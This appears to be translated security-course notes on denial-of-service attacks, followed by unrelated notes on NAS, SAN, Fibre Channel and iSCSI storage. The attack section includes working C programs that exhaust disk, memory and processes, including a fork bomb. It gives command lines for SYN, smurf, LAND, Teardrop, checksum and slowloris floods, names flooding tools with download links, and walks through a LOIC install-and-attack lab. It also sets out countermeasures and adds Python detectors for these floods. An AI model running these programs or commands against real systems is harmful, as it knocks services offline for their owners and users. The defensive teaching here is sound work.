#include <stdio.h>
#include <unistd.h>

int main(void)
{
        char buf[10000] = {0};                          /* the content does not matter, only the size */
        int attack = creat("/root/tempfile", 0777);     /* creat(2); path as in the notes, run as root */

        if (attack < 0) { perror("creat"); return 1; }
        while (write(attack, buf, sizeof(buf)) > 0)     /* loops until the disk, or the quota, is full */
                ;
        perror("write");                                /* ENOSPC (or EDQUOT if a quota stopped it) */
        return 1;
}


# gcc -o disk_attack disk_attack.c

# ./disk_attack


Countermeasures
- Find the offending process and terminate it
- Set a disk quota for each user
- Put the shared directories (/tmp, /var/tmp) on their own partitions so filling them cannot fill /




■ Local attack (system resource exhaustion)

Technique: memory exhaustion

Principle
- One process exhausts every memory resource the system can provide, paralysing the system

Attack code and how to run it

# vi memory_attack.c

#include <stdlib.h>
#include <string.h>

int main(void)
{
        char *c;

        while (1) {
                c = malloc(1000);
                if (c == NULL)                  /* refused: RLIMIT_AS (ulimit -v) or the system is out of memory */
                        return 1;
                memset(c, 0xAA, 1000);          /* touch the pages: on Linux an untouched malloc only grows the virtual size */
        }
}


# gcc -o memory_attack memory_attack.c

# ./memory_attack


Countermeasures
- Limit the maximum memory each user may use
- ulimit command, /etc/security/limits.conf (the "as" item limits address space in KB, e.g. "* hard as 524288")







■ Local attack (system resource exhaustion)

Technique: process exhaustion

Principle
- Keeps creating processes until system resources are exhausted, paralysing the system (a fork bomb)

Attack code and how to run it

# vi process_attack.c

#include <unistd.h>

int main(void)
{
        while (1)               /* every child runs the same loop, so the count grows exponentially */
                fork();
}


# gcc -o process_attack process_attack.c

# ./process_attack


Countermeasures
- Limit the maximum number of processes each user may create
- ulimit command (ulimit -u), /etc/security/limits.conf (the "nproc" item, e.g. "* hard nproc 200")




■ Remote attack

Technique: SYN flooding

Principle
- Using IP spoofing, half-open TCP connections are initiated until the target host's listen queue (SYN backlog) is exhausted
- [Figure] example diagram of the attack

About SYN flooding
- SYN flooding exploits a design weakness in the TCP connection-setup procedure itself, so there is no complete fix.
- To reduce or minimise the damage, the current practice is an anti-DDoS solution, or moving the servers to a secure IDC with a large backbone as a stopgap (for both real-IP DDoS and spoofed DDoS).

Attack tools
(Windows) Hgod (http://www.cnhonker.com)
     Hgod features
     - Spoofed / non-spoofed SYN flooding
     - Spoofed / non-spoofed UDP flooding
     - Spoofed / non-spoofed ICMP/IGMP flooding
     - DrDoS
(Linux) Synk4 (http://packetstorm.security.com/new-exploits/synful.c)
                (http://user.cs.tu-berlin.de/~tqiu/exploits/synk4.c)

Countermeasures
- Increase the backlog queue size and shorten the half-open timeout
- On Linux these are the sysctls net.ipv4.tcp_max_syn_backlog and net.ipv4.tcp_synack_retries; net.ipv4.tcp_syncookies = 1 is the most effective single setting, since it lets the kernel answer SYNs without holding queue state

Checking for the attack

# netstat -an
  -> a large number of connections stuck in the SYN_RECV state

or

Wireshark packet capture
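The netstat check above can be automated. The Python function below counts half-open (SYN_RECV) connections per remote address from `netstat -an` output and flags sources over a threshold; a spoofed flood such as synk4's shows up instead as a large total spread over many random sources, so the total is reported as well. This is an added example, not a tool from the course; the netstat excerpt inside it is constructed.

```python
"""Count SYN_RECV entries per remote address in `netstat -an` output.
Added example for the SYN flooding notes; the excerpt is constructed."""
from collections import Counter

# Constructed excerpt of `netstat -an` on a Linux web server under attack.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.20.200:80       10.9.8.7:40001          SYN_RECV
tcp        0      0 192.168.20.200:80       10.9.8.7:40002          SYN_RECV
tcp        0      0 192.168.20.200:80       10.9.8.7:40003          SYN_RECV
tcp        0      0 192.168.20.200:80       172.16.5.5:51234        SYN_RECV
tcp        0      0 192.168.20.200:80       192.168.20.50:60734     ESTABLISHED
tcp        0      0 192.168.20.200:22       192.168.20.10:55123     ESTABLISHED
udp        0      0 0.0.0.0:68              0.0.0.0:*
"""

HALF_OPEN_STATE = "SYN_RECV"   # netstat spelling; `ss -ant` prints SYN-RECV in its first column


def parse_connections(text):
    """Yield (proto, local, remote, state) for each TCP line that has a state column."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue                       # header lines and UDP lines (no state)
        yield parts[0], parts[3], parts[4], parts[5]


def half_open_by_source(text):
    """Counter of remote IPs that hold SYN_RECV entries (port stripped)."""
    per_ip = Counter()
    for _proto, _local, remote, state in parse_connections(text):
        if state == HALF_OPEN_STATE:
            per_ip[remote.rsplit(":", 1)[0]] += 1
    return per_ip


def syn_flood_suspects(text, per_ip_threshold=3, total_threshold=100):
    """Return (suspect IPs over per_ip_threshold, total half-open, total over
    total_threshold).  Compare total_threshold with the listen backlog; a
    spoofed flood never trips the per-IP test but does fill the queue."""
    per_ip = half_open_by_source(text)
    total = sum(per_ip.values())
    suspects = [ip for ip, n in per_ip.most_common() if n >= per_ip_threshold]
    return suspects, total, total >= total_threshold


if __name__ == "__main__":
    suspects, total, flooding = syn_flood_suspects(SAMPLE_NETSTAT)
    print(f"half-open total={total} suspects={suspects} backlog-flood={flooding}")
```

On a live box run it as `syn_flood_suspects(subprocess.check_output(["netstat", "-an"], text=True))`; when tcp_syncookies is on, the SYN_RECV count stays low even under attack, and the kernel log line "possible SYN flooding on port 80" is the signal instead.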









■ Remote attack

Technique: Ping of Death

Principle
- ICMP echo requests are made much larger than normal with ping. To reach the target network they must be fragmented, and the target system has to spend a lot of resources reassembling the small fragments; the attack exploits that load. (The original Ping of Death went further: the reassembled datagram exceeded the 65,535-byte IP maximum and crashed unpatched stacks.)
# ping -n 10000 -l 65500 <Victim's IP>
  -> Windows ping syntax: -n is the count, -l the payload size in bytes



■ Remote attack

Technique: ICMP Smurf

Principle
- Uses the ICMP protocol and the IP broadcast address
- Echo requests are sent to a broadcast address with a forged source, so the mass of echo replies is concentrated on that (victim) address
- [Figure] example diagram of the attack

Attack tools
smurf.c (http://packetstormsecurity.org/DoS/spike.sh.zip)
With Hgod, set the source to the victim's IP (IP spoofing) and send to the amplifier network's broadcast address.
# ./smurf <Victim's IP> bcastfile 0 5 64

Countermeasures
- Disable directed broadcast on every internal (LAN-side) router interface (on Cisco IOS: no ip directed-broadcast)
- Do not let ICMP echo requests addressed to your internal broadcast address (e.g. 192.168.0.255) in from outside



■ Remote attack

Technique: Bonk/Boink, Teardrop

Principle
- Most protocols are designed to raise reliability, which comes down to three things:
     * Are the packets in the right order?
     * Was any packet lost along the way?
     * Retransmission of lost packets
- Bonk/Boink and Teardrop mount a DoS on the target by violating these rules in the IP fragment reassembly process; the "sequence numbers" below are the fragment offsets the target uses to put the pieces back together.
- (Bonk) Sends the first fragment as number 1, then forges the second and third so that they also carry number 1
- (Boink) An improved Bonk: sends the first fragment as 1, the second as 101, the third as 201 and so on normally, then switches to a fixed number part-way, e.g. the tenth, eleventh and twelfth fragments all carry 1001
- (Teardrop) Sends fragments so that they overlap, or so that data at regular intervals is missing. Teardrop abuses a weakness in the process of splitting an IP datagram into fragments and reassembling them. A large block of data is normally cut into fragments, each carrying an offset, and the destination uses those offsets to reassemble it. If the offsets are made to overlap, the system hangs, crashes or reboots. This was a Windows 95-era problem, but it still imposes a large overhead on networks and systems today.
- [Figure] example diagram of the attack


Normal fragment transmission

==============================================================================

Offset         (1)      (101)    (201)    (301)    (401)

                |        |        |        |        |
                |<------>|        |        |        |
                |        |<------>|        |        |
                |        |        |<------>|        |
                |        |        |        |<------>|
                |        |        |        |        |

==============================================================================


Abnormal (overlapping / gapped) fragment transmission

==============================================================================

Offset         (1)      (101)    (201)    (301)    (401)

                |        |        |        |        |
                |<------>|        |        |        |
                |     <------->   |        |        |
                |   (81) |  (181) | (221)  | (321)  |
                |        |        |   <----->       |
                |        |        |      <------->  |
                |        |        |   (251)|  (351) |

==============================================================================


Attack method
# ./newtear <attacker IP> <target IP> -s <source port> -t <target port> -n <number of packets>
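A receiver, or an IDS decoder, recognises Bonk, Boink and Teardrop fragment trains by checking exactly the three properties listed above before it touches a reassembly buffer. The Python check below does that over (offset, length) pairs and names each violation. It is an added example, not from the notes; the fragment trains are constructed, and offsets are modelled in bytes rather than in the 8-byte units of the IP header.

```python
"""Validate an IP fragment train for order, gaps and overlaps.
Added example for the Bonk/Boink/Teardrop notes; fragment trains are constructed."""


def check_fragments(frags, total_len):
    """frags: list of (offset, length) in bytes, in arrival order.
    total_len: datagram length the last fragment announces.
    Returns (ok, problems); problems is a list of human-readable strings."""
    problems = []
    by_offset = sorted(frags)
    if by_offset != list(frags):
        problems.append("out of order")          # tolerable, but worth noting
    covered_end = 0                               # bytes [0, covered_end) seen so far
    for off, ln in by_offset:
        if ln <= 0 or off < 0:
            problems.append(f"bad fragment ({off},{ln})")
            continue
        if off < covered_end:                     # Bonk / Boink / Teardrop signature
            problems.append(f"overlap at {off} (covered up to {covered_end})")
        elif off > covered_end:                   # data missing in the middle
            problems.append(f"gap {covered_end}-{off}")
        covered_end = max(covered_end, off + ln)
    if covered_end < total_len:
        problems.append(f"missing tail {covered_end}-{total_len}")
    elif covered_end > total_len:
        problems.append(f"exceeds declared length ({covered_end} > {total_len})")
    return not problems, problems


# Constructed trains mirroring the diagrams above (offset, length).
NORMAL = [(0, 100), (100, 100), (200, 100), (300, 100), (400, 100)]
BONK = [(0, 100), (0, 100), (0, 100)]                        # every fragment claims offset 0
BOINK = [(0, 100), (100, 100), (200, 100), (1000, 36), (1000, 36), (1000, 36)]
TEARDROP = [(0, 100), (80, 100), (220, 100), (250, 100)]     # overlaps and a gap

if __name__ == "__main__":
    for name, train, total in [("normal", NORMAL, 500), ("bonk", BONK, 300),
                               ("boink", BOINK, 1036), ("teardrop", TEARDROP, 500)]:
        ok, problems = check_fragments(train, total)
        print(f"{name:9} ok={ok} {problems}")
```

Snort's frag3 preprocessor performs this kind of check (and chooses which overlapping copy to keep according to the target OS), which is why fragment attacks appear as preprocessor alerts rather than as rule hits.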




■ Remote attack

Technique: LAND attack (loop)

Principle
- A packet is crafted whose source and destination IP addresses are both the victim's own address and sent to the target. The system answers the initial SYN by taking the source address as the destination of its reply; since that address is its own, the reply never leaves the host and comes straight back to it. Like SYN flooding this uses up the concurrent-connection capacity, and it drives up CPU load as well.
- [Figure] example diagram of the attack

Attack method
- Use synk4 with the source and destination addresses set to the same value

# ./synk4 192.168.1.100 30 1024 192.168.1.100 21
  -> analyse the Wireshark packet capture (a rule matching source IP == destination IP catches this directly)


■ Remote attack

Technique: WinNuke

Principle
- Scans the target for TCP port 139 and, if it is open, sends NetBIOS packets with the URG (urgent) flag set. URG signals an abnormal condition in the middle of a transfer, playing the same role as <Ctrl+Break> or <Ctrl+C> during a service.
- The target recognises the flood of urgent packets, closes all of its sessions and asks for reconnection, which overloads the CPU. In bad cases the system itself is damaged.

Attack tool
- Wnuke5 (winnuke.c)

About WinNuke
- The packets sent generally carry out-of-band data; on Windows NT-family boxes the TCPIP.sys module raises Stop 0x0000000A and the system halts.




■ Remote attack

Technique: UDP flooding - still works today

Principle
- The DoS/DDoS attack most often used for bandwidth exhaustion. The UDP body is padded with garbage data and sent at volume.

Attack tool
- UDP Flooder 2.00



■ Remote attack

Technique: out-of-band flooding

Principle
- DoS/DDoS attack that omits the TCP flags a normal TCP/IP session setup would produce, or sends flag combinations in an abnormal order

Attack tool
- stream3.c
     stream3.c features
     * SYN flooding
     * NULL flooding
     * FIN flooding
     * ACK flooding
     * PUSH flooding
     * RST flooding
     * FIN/ACK flooding
     * XMAS flooding


■ Remote attack

Technique: DDoS ping

Principle

Attack tool
- DDoSPing 1.03 (Trinoo)



■ Remote attack

Technique: mail bomb - still widely used today

Principle
- A mail bomb is commonly called bomb mail; spam mail is the same sort of thing. A mail server allots each user a fixed amount of disk space, and when a flood of mail fills it the mail that should be received can no longer be delivered. This is why spam can amount to a DoS attack.

Attack tool
- Windows mail bomber Up Yours (Digital Dominance (c) 1997 -=Global kOS=- [Up Yours 4.0])




■ Remote attack

Technique: checksum error flooding

Principle
- A checksum is a single field in the packet computed by treating the data as a sequence of binary numbers and adding them up. The Internet checksum used by IP, ICMP, UDP and TCP splits the data into 16-bit words, adds them in one's-complement arithmetic (any carry out of the 16th bit is added back into the low bits), and stores the bitwise complement of the result in the header.
- Sending large numbers of packets with incorrect checksums affects the performance of the system or network, because every packet has to be summed in full before it can be rejected.


-----------------------------------

h  e  l  l  o     w  o  r  l  d  .
-----------------------------------
48 65 6c 6c 6F 20 77 6F 72 6C 64 2E

-----------------------------------

4865 + 6C6C + 6F20 + 776F + 726C + 642E = 271FA; folding the carry back in: 71FA + 2 = 71FC

(the value actually written into the header is the one's complement, ~71FC = 8E03)





■ Remote attack

Technique: IP checksum error

Principle
- Sends large numbers of packets whose IP header checksum is wrong, bringing the target server down or making normal service impossible.

Attack method
# ./ipchksum <source IP> <target IP> <port>



■ Remote attack

Technique: ICMP checksum error

Principle
- Sends large numbers of packets whose ICMP header checksum is wrong, bringing the target server down or making normal service impossible.

Attack method
# ./icmpchecksum <source IP> <target IP> <port>



■ Remote attack

Technique: UDP checksum error

Principle
- Sends large numbers of packets whose UDP header checksum is wrong, bringing the target server down or making normal service impossible.

Attack method
# ./udpchksum <target> <bcast file> <num packets> <packet delay> [dstport] [srcport] [psize]



■ Remote attack

Technique: botnet

Principle
- Bot is short for robot: infected computers (zombies, the "hacker army" or troops) are controlled by an attacker (bot master) through C&C servers. Vulnerable servers are commonly abused as C&C (command and control) servers.
- Used to distribute malware, send phishing/spam mail, leak personal data, install adware and spyware, and run denial-of-service (DoS) attacks


Attacker -----+-----> command relay server (C&C)

              +-----> command relay / file download server

                                  |
                                  |
                                  V

                          Zombie PCs ......

                                  |
                                  |
                                  V

                          Target system



■ Remote attack

Technique: Netbot attack

Principle
- A tool widely known as a Chinese ransom (money-demanding) DDoS attack kit.
- It consists of a server and a builder: malware produced with the builder turns infected machines into zombies controlled from the server.
- Used against a range of Korean sites including game and portal sites.

Attack tool
- NB5.5Build.exe (NB 5.5)
- NetBot_Cn.exe




■ Remote attack

Technique: TCP slow attack - still works today

Principle
- The TCP slow attack was used in the 7.7 DDoS of 7 July 2009: many zombie PCs each open only a small number of TCP connections and keep them alive (Slowloris sends partial HTTP headers and never completes them), making it hard to tell abnormal session requests from normal ones
- Because almost no bandwidth is involved, it is caught by per-connection timeouts rather than by volume, e.g. Apache's mod_reqtimeout (RequestReadTimeout), not by bandwidth-based defences

Attack tool
- Install Perl for Windows (ActivePerl)
- www.perlmania.or.kr:8949/pmdocs/kys/perlstart.html
- # perl slowloris.pl -dns 192.168.0.100




■ Remote attack

Technique: HTTP GET flooding

Principle
- Directly affects a web server offering HTTP service: a large number of connection requests is sent so that the connections of legitimate users are obstructed.
- Attacks the target site with maximum-size (1514-byte) frames; any reasonable string will do for the data area.

Attack tool
- Low Orbit Ion Cannon (LOIC)
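On the server, a GET flood stands out in the access log as one client (or a handful of zombies) far exceeding the request rate of any browser. The Python detector below runs a one-second sliding window per client IP over Apache/nginx combined-format log lines and reports the peak rate of each client over the threshold. It is an added example, not from the course or from LOIC; the log lines are constructed.

```python
"""Per-client request-rate detector over combined-format access log lines.
Added example for the HTTP GET flooding notes; the log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# client - - [timestamp] "request" status size ...   (combined log format)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')


def parse_line(line):
    """Return (ip, datetime, request line) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["req"]


def flood_sources(lines, window_s=1.0, max_req=10):
    """Sliding window per client IP.  Returns {ip: peak requests seen in any
    window} for IPs whose peak exceeds max_req."""
    windows = defaultdict(deque)
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _req = parsed
        q = windows[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop timestamps outside the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > max_req}


def _line(ip, second, path):
    """Build one constructed combined-format line inside one minute of the lab."""
    return f'{ip} - - [23/Aug/2016:14:07:{second:02d} +0900] "GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'


# Constructed sample: a normal browser at .10 and a LOIC-style flood from .50.
SAMPLE_LOG = (
    [_line("192.168.20.10", 28, "/index.html"), _line("192.168.20.10", 29, "/style.css")]
    + [_line("192.168.20.50", 30, "/") for _ in range(15)]
    + [_line("192.168.20.50", 31, "/") for _ in range(4)]
    + [_line("192.168.20.10", 33, "/logo.png"), "garbage line that is not a log entry"]
)

if __name__ == "__main__":
    for ip, n in flood_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} requests within {1.0}s")
```

Access logs only have one-second resolution, so the window cannot be made finer than that; for a real deployment run it over `tail -f` output and pair a hit with a temporary iptables or mod_evasive block, remembering that the zombies behind a real DDoS each stay under the threshold.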


[Lab] DoS attack lab using the LOIC (Low Orbit Ion Cannon) tool


Low Orbit Ion Cannon

A network stress-testing tool.

It makes it easy to run distributed denial-of-service attacks against websites, including those of many public bodies, and became well known through its use by Anonymous.

The lab was done on Windows 2008 (.NET Framework -> LOIC).


(Kali Linux)

# apt-get update

# apt-get install git git-core monodevelop mono-mcs mono-dmcs

Couldn't find any package whose name or description matched "mondodevelop"

Couldn't find any package whose name or description matched "mondodevelop"

The following NEW packages will be installed:

  git-core

The following packages will be REMOVED:

  libafpclient0{u} libcrypt-passwdmd5-perl{u} libmozjs24d{u} libnet-daemon-perl{u}

  libplrpc-perl{u} memtest86+{u} syslinux-themes-debian{u}

  syslinux-themes-debian-wheezy{u} xulrunner-24.0{u}

0 packages upgraded, 1 newly installed, 9 to remove and 39 not upgraded.

Need to get 1,336 B of archives. After unpacking 55.9 MB will be freed.

Do you want to continue? [Y/n/?] Y

Get: 1 http://http.kali.org/kali/ kali/main git-core all 1:1.7.10.4-1+wheezy1 [1,336 B]

Fetched 1,336 B in 7s (180 B/s)

(Reading database ... 366570 files and directories currently installed.)

..... (omitted) .....

* Installing 5 assemblies from libnunit2.6-cil into Mono

Setting up libnunit-cil-dev (2.6.0.12051+dfsg-2) ...

Setting up monodoc-base (2.10.8.1-8+deb7u1) ...

Setting up monodevelop (3.0.3.2+dfsg-1) ...

Setting up libmono2.0-cil (2.10.8.1-8+deb7u1) ...

Setting up libmono-cil-dev (2.10.8.1-8+deb7u1) ...

Setting up mono-devel (2.10.8.1-8+deb7u1) ...

update-alternatives: using /usr/bin/mono-csc to provide /usr/bin/cli-csc (c-sharp-compiler) in auto mode

update-alternatives: using /usr/bin/resgen to provide /usr/bin/cli-resgen (resource-file-generator) in auto mode

update-alternatives: using /usr/bin/al to provide /usr/bin/cli-al (assembly-linker) in auto mode

update-alternatives: using /usr/bin/sn to provide /usr/bin/cli-sn (strong-name-tool) in auto mode

Processing triggers for menu ...

-> If the installation stops with an error, simply run the command again.


# mkdir /loic

# cd /loic

# wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

-> output omitted


# vi loic.sh

#!/bin/bash

# Copyfuck © 2010 q

#

# This script installs, updates and runs LOIC on Linux.

#

# Supported distributions:

#   * Ubuntu

#   * Debian

#   * Fedora

#

# Usage: bash ubuntu_loic.bash <install|update|run>

#

 

GIT_REPO=http://github.com/NewEraCracker/LOIC.git

GIT_BRANCH=master

 

DEB_MONO_PKG="monodevelop liblog4net-cil-dev"

FED_MONO_PKG="mono-basic mono-devel monodevelop mono-tools"

 

..... (omitted) ....

 

case $1 in

    install)

        compile_loic

        ;;

    update)

        update_loic

        ;;

    run)

        run_loic

        ;;

    *)

        echo "Usage: $0 <install|update|run>"

        ;;

esac





        [Note] Run these commands if needed

        # apt-get update

        # apt-get upgrade

        # apt-get install monodevelop mono-gmcs


        [Note] As of 27 June 2016 the package names have changed.

        # apt-get install mono-xbuild mono-devel mono-mcs


# chmod +x loic.sh
  -> execute permission is all the script needs; chmod 777 would also make it world-writable

# ./loic.sh

Usage: ./loic.sh <install|update|run>


# ./loic.sh install  (or: # bash loic.sh install)

/usr/bin/git

MonoDevelop Build Tool

Loading solution: /loic/LOIC/LOIC.sln

   Loading solution: /loic/LOIC/LOIC.sln

      Loading projects ..

Building Solution: LOIC (Debug)

   Building: IRC (Debug)

      Performing main compilation...

      WARNING: Assembly 'log4net, Version=1.2.10.0, Culture=neutral,

      PublicKeyToken=1b44e1d426115821, processorArchitecture=MSIL' not found. Make sure

      that the assembly exists in disk. If the reference is required to build the project

      you may get compilation errors.

      /usr/bin/gmcs /noconfig "/out:/loic/LOIC/bin/Debug/IRC.dll"

      "/r:/usr/lib/mono/2.0/System.dll" "/r:/usr/lib/mono/2.0/System.Core.dll" /nologo

      /warn:4 /debug:full /optimize- /codepage:utf8 /platform:x86 "/define:DEBUG;TRACE"

      /t:library "/loic/LOIC/IRC/Client/Channel.cs" "/loic/LOIC/IRC/Client/ChannelUser.cs"

      "/loic/LOIC/IRC/Client/Delegates.cs" "/loic/LOIC/IRC/Client/EventArgs.cs"

      "/loic/LOIC/IRC/Client/IrcClient.cs" "/loic/LOIC/IRC/Client/IrcMessageData.cs"

..... (omitted) .....

   Building: LOIC (Debug)

      Performing main compilation...

      Compiling resource /loic/LOIC/frmMain.resx with /usr/bin/resgen2

      Compiling resource /loic/LOIC/frmWtf.resx with /usr/bin/resgen2

      Compiling resource /loic/LOIC/Properties/Resources.resx with /usr/bin/resgen2

      /usr/bin/gmcs /noconfig "/out:/loic/LOIC/bin/Debug/LOIC.exe"

      "/r:/usr/lib/mono/2.0/System.dll" "/r:/usr/lib/mono/2.0/System.Drawing.dll"

      "/r:/usr/lib/mono/2.0/System.Windows.Forms.dll" "/r:/loic/LOIC/bin/Debug/IRC.dll"

      "/r:/usr/lib/mono/2.0/System.Core.dll" /nologo /warn:4 /debug:full /optimize-

      "/win32icon:/loic/LOIC/LOIC.ico" /codepage:utf8 /platform:x86 /main:LOIC.Program

      /t:winexe "/loic/LOIC/frmMain.cs" "/loic/LOIC/frmMain.Designer.cs"

      "/loic/LOIC/frmWtf.cs" "/loic/LOIC/frmWtf.Designer.cs" "/loic/LOIC/HTTPFlooder.cs"

      "/loic/LOIC/Program.cs" "/loic/LOIC/Properties/AssemblyInfo.cs"

      "/res:/loic/LOIC/frmMain.resources,LOIC.frmMain.resources"

      "/res:/loic/LOIC/frmWtf.resources,LOIC.frmWtf.resources"

      "/res:/loic/LOIC/Properties/Resources.resources,LOIC.Properties.Resources.resources"

      "/loic/LOIC/Properties/Resources.Designer.cs" "/loic/LOIC/XXPFlooder.cs"

      Compilation succeeded - 1 warning(s)

      

      /loic/LOIC/frmMain.cs(180,59): warning CS0219: The variable `ipHost' is assigned but

      its value is never used

      

      

      Build complete -- 0 errors, 1 warning


# ./loic.sh update

/usr/bin/git

Current branch master is up to date.

/usr/bin/git

MonoDevelop Build Tool

Loading solution: /loic/LOIC/LOIC.sln

   Loading solution: /loic/LOIC/LOIC.sln

      Loading projects ..

# ./loic.sh run

-> For usage, refer to the internet.

-> Refer to the youtube.com videos.

"1. Select your target" section
URL:
http://192.168.20.200

-> Lock on

 

"2. Attack options" section

Method: HTTP

 

"3. Ready?" section

"IMMA CHARGIN MAH LAZER"

-> [Lab] Choose HTTP, TCP or UDP as the attack method and analyse the packets in Wireshark.


■ TCP attack

---------------------

192.168.20.50    192.168.20.200   TCP     78      [TCP segment of a reassembled PDU]

  -> payload pushed over an established connection with no recognised application protocol, so the flood looks like plain data segments



■ UDP attack

---------------------

192.168.20.50    192.168.20.200   QUIC    54      CID: 32, Seq: 28519

  -> the "QUIC" label comes from Wireshark's QUIC dissector, which is bound to UDP port 80/443 and guesses at the payload; the traffic is LOIC's UDP flood, not QUIC



■ HTTP attack

---------------------

192.168.20.50    192.168.20.200   TCP     74      60734→80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=127301 TSecr=0 WS=1024

  -> the handshake of a new connection to port 80; over the whole run the capture fills with these SYNs followed by the GET requests










NAS(Network Attached Storage)





■ Terms

DAS (Direct Attached Storage)

SAN (Storage Area Network)

NAS (Network Attached Storage)


FC protocol

IP protocol



■ DAS (block-level access)

- Internal DAS (e.g. internal disks)

- External DAS (e.g. external disk enclosures)


■ SAN (block-level access)

- FC SAN

- IP SAN (e.g. iSCSI, FCIP, FCoE)


■ NAS (file-level access)



NAS vs. SAN

 

Network Attached Storage (NAS)
- Connect to a shared storage device across the network
- File-level access

Storage Area Network (SAN)
- Looks and feels like a local storage device
- Block-level access
- Very efficient reading and writing

Requires a lot of bandwidth
- May use an isolated network and high-speed network technologies

 

Fibre Channel(FC)

A specialized high-speed topology
- Connect servers to storage
- 2-,4-,8- and 16-gigabit per second rates
- Supported over both fiber and copper

Servers and storage connect to a Fibre Channel switch
- Server(initiator) needs a FC interface
- Storage(target) is commonly referenced by SCSI, SAS, or SATA commands

 

Fibre Channel over the data network

Fibre Channel over Ethernet (FCoE)
- Use Fibre Channel over an Ethernet network
- No special networking hardware needed
- Usually integrates with an existing Fibre Channel infrastructure
- Not routable

Fibre Channel over IP (FCIP)
- Encapsulate Fibre Channel data into IP packets
  -> Fibre Channel tunneling
- Geographically separate the servers from the storage

 

iSCSI

Internet Small Computer Systems Interface
- Send SCSI commands over an IP network
- Created by IBM and Cisco, now an RFC standard

Makes a remote disk look and operate like a local disk
- Like Fibre Channel

Can be managed quite well in software
- Drivers available for many operating systems
- No proprietary topologies or hardware needed

On the whole, we are storing more data than ever before and the numbers continue to increase. From a security perspective, this becomes extremely important because a lot of this data is being transferred across the network. When we talk about storage that’s across the network, we tend to use two terms almost interchangeably, but these two terms are actually very different.

One is Network Attached Storage, or NAS. The NAS storage is storage that is outside of our device. We’re connecting to across the network, but we access the data on that storage at a file level. If we need to change just part of a file, then we have to overwrite the entire file on that storage device. And likewise, if we need just a little bit of data out of a file, we have to retrieve the entire file from that device to be able to work with it.


Another common term you’ll hear for this remote storage device is a SAN, or a Storage Area Network. It is indeed a storage device that is located across the network. But under the surface, it works very differently. A SAN works on something called block-level access. This is very similar to how our local hard drives and storage devices work on our local computers, where if we need to change part of a file, we simply change the individual bytes within that file that we need to change and we leave the rest of the file untouched. Works exactly the same with a SAN, except we’re performing that communication across the network. And as it sounds, it’s much more efficient for reading and writing, because you’re only changing or you’re only reading the information that you need at that particular time.


One very common thing for both of these technologies is that they use a lot of bandwidth. You’re storing information across the network and every time you want to send a file or receive a file, you’re going to be using a lot of bandwidth on that network. It’s very common to engineer these types of networks so that they are on their own isolated network that has no effect on any of the other network traffic in your organization. And it’s not unusual to see very, very high speeds dedicated to this Storage Area Network or the network-attached storage.


The need for such high rates of speed across these storage networks has really driven the creation of a specialized topology called Fibre Channel. This Fibre Channel technology connects directly from a server with a Fibre Channel port to the storage, which is on a, also of course, a Fibre Channel port. And these are very high rates of speed. You can run from two gigabits per second all the way up to the modern versions of 16 gigabits per second over that Fibre Channel link.


Although the initial implementations of Fibre Channel ran over fiber optic technology, today’s modern version of Fibre Channel will run over both fiber and copper cables. Just as ethernet has switches that support the communication across the ethernet topology, Fibre Channel also has Fibre Channel switches that everybody connects to. So if you have a server that needs to connect to Fibre Channel storage, then you will need a Fibre Channel port somewhere on that server.


Often very high end servers will have a Fibre Channel interface already built into the motherboard. But you could, of course, add an adapter card to provide that interface as well. Servers are often referred to as initiators, and the storage devices themselves are referred to as the targets on a Fibre Channel topology. The communication between the initiator and the target is often over very well known technologies like SCSI, serial attached SCSI, or using SATA commands.


On a Fibre Channel storage network, you would ideally connect directly to the Fibre Channel switch. But if you do have devices that are outside the network or still need access to the Fibre Channel storage but don’t have a Fibre Channel interface, you can run Fibre Channel over Ethernet, or FCoE. This communicates and sends Fibre Channel messages over an ethernet network and it doesn’t require your workstation or your server to have a specialized Fibre Channel interface. This is usually something that is integrated into an existing Fibre Channel infrastructure. So there is usually an ethernet connection coming out of your Fibre Channel switches that provides this link between the Fibre Channel world and the ethernet world.


Fibre Channel over Ethernet is a non-routable protocol that’s using the ethernet frames as communication. So it’s something that you commonly see within a single subnet or a single local area. You don’t often run this type of technology over larger distances where all of that traffic would be routed.


Of course, there’s a solution for sending Fibre Channel information over these routable IP networks, and that’s called Fibre Channel over IP, or FCIP. Fibre Channel over IP is taking all the Fibre Channel information and encapsulating it within the TCP/IP packets themselves. This is sometimes referred to as Fibre Channel tunneling, because we’re putting all the Fibre Channel information and tunneling it through that IP network.


This allows us to have devices that are very geographically dispersed across multiple locations and multiple data centers, but still able to send information and use the storage network on the Fibre Channel infrastructure.


Another popular technology for connecting you to your data across the network is called iSCSI. iSCSI stands for Internet Small Computer Systems Interface. If you’ve ever worked with SCSI drives on a local computer, this is a way to extend that technology across the network through a routed set of protocols. It’s a standard that was created by IBM and Cisco. And it’s one that, instead of being proprietary, is very open. There’s an RFC standard for iSCSI.


Just like Storage Area Networks and Fibre Channel, iSCSI allows you to use the storage across the network, but make that storage look like it is on your local computer. That block-level storage means you have very efficient reads and writes to that storage. And because it’s SCSI, it’s something that is very well known in the industry. SCSI’s been around for a very long time. And the commands used to access SCSI devices are ones that the developers are very comfortable with. Drivers are available for iSCSI across many different operating systems, and it’s quite easy to implement because you don’t need any proprietary hardware or software to make iSCSI work.



■ FC-SAN(Fibre Channel Storage Area Network)



■ IP-SAN

        ■ iSCSI

        ■ FC-IP




■ iSCSI


■ FC-IP





■ FCoE(FC over Ethernet)


■ NAS(Network Attached Storage)



[Lab] Installing and using FreeNAS



